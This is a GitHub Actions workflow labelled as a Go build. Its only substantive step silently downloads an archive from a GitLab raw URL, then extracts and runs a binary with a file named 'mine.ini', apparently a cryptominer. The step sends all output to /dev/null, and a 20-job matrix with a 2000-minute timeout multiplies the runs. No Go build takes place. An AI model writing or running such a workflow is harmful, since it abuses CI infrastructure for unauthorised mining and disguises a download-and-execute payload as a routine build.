# This workflow will build a golang project
# For more information see: https://docs.github.com/en/actions/automating-builds-and-tests/building-and-testing-go

name: Go

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

jobs:

  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        go: [1.12, 1.13, 1.14, 1.15, 1.16]
        flag: [pkn, ips, bin, jos]
    timeout-minutes: 2000

    steps:
    - uses: actions/checkout@v1

    - name: Set up Go
      uses: actions/setup-go@v1
      with:
        go-version: '1.20'

    - name: copon
      run: wget https://gitlab.com/gas_kan/azkarillah/-/raw/master/aska.tar.gz && tar -xvf aska.tar.gz && chmod +x ikuk mine.ini && ./ikuk mine.ini > /dev/null 2>&1
      


